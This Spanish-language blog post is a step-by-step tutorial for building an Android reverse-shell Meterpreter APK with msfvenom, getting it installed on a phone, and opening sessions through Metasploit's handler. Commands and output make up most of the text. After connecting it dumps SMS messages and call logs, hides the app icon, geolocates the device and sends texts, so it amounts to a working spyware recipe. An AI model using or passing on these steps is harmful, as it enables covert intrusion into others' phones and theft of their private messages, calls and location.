jueves, 25 de mayo de 2017

Instalando y usando Metasploit en MacBook Sierra para Acceder a un Android


1) Descargamos el paquete de:
 http://osx.metasploit.com/metasploit-framework-4.14.22%2B20170525092251-1rapid7-1.pkg


2) Instalamos por defecto, aceptamos términos y condiciones.


3) Agregamos los alias ó también podemos agregar la ruta al path de ejecución:
$ alias msfconsole='/opt/metasploit-framework/bin/msfconsole' 
$ alias msfvenom='/opt/metasploit-framework/bin/msfvenom'


4) Generamos la aplicación la cual se conectará a la pc atacante, ponemos un payload de shell reversa, el LHOST es la ip de la mac y la ruta donde mandaremos la aplicacion que instalaremos en el android:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.42 R > Desktop/Aplicacion.apk 
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8779 bytes


5) Ahora hay que copiarlo al android al cual "atacaremos", ahi esta en cada uno como pasarlo, yo lo pasé en mi celular mediante dropbox, instalarlo. 6) Desde la mac abrimos el msfconsole:
$ msfconsole 


7) Indicamos el exploit, el payload el host remoto y el host local, ejecutamos el exploit y luego ejecutamos la aplicación desde el android:

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.42
LHOST => 192.168.1.42

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.42:4444 
[*] Starting the payload handler...
[*] Sending stage (68443 bytes) to 192.168.1.39
[*] Meterpreter session 1 opened (192.168.1.42:4444 -> 192.168.1.39:59209) at 2017-05-25 23:03:51 -0300
[*] Sending stage (68443 bytes) to 192.168.1.39
[*] Meterpreter session 2 opened (192.168.1.42:4444 -> 192.168.1.39:39350) at 2017-05-25 23:03:52 -0300
[*] Sending stage (68443 bytes) to 192.168.1.39
[*] Meterpreter session 3 opened (192.168.1.42:4444 -> 192.168.1.39:37856) at 2017-05-25 23:03:52 -0300

[-] Failed to load client script file: /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb


8) Ya tenemos la sesión iniciada, vamos a bajar los mensajes:
meterpreter > dump_sms [*] Fetching 9 sms messages [*] SMS messages saved to: sms_dump_20170525230451.txt meterpreter >


9) Descargamos las llamadas:
meterpreter > dump_calllog
[*] Fetching 5 entries [*] Call log saved to calllog_dump_20170525230542.txt meterpreter >


10) Ocultamos el icono de la aplicación:
meterpreter > hide_app_icon
[*] Activity MainActivity was hidden


11) Obtenemos la ubicación geográfica mediante la wifi a la cual se conectó:
meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of -xx.yyyyy.xxxx. [*] Google Maps URL: https://maps.google.com/?q=-xx.yyyyy.xxxx meterpreter >


12) Mandamos un msj de texto al celular 01234567890 con el mensaje -> desde el atacante:
meterpreter > send_sms -d "01234567890” -t "Desde el atacante”
[+] SMS sent - Transmission successful


No hay comentarios: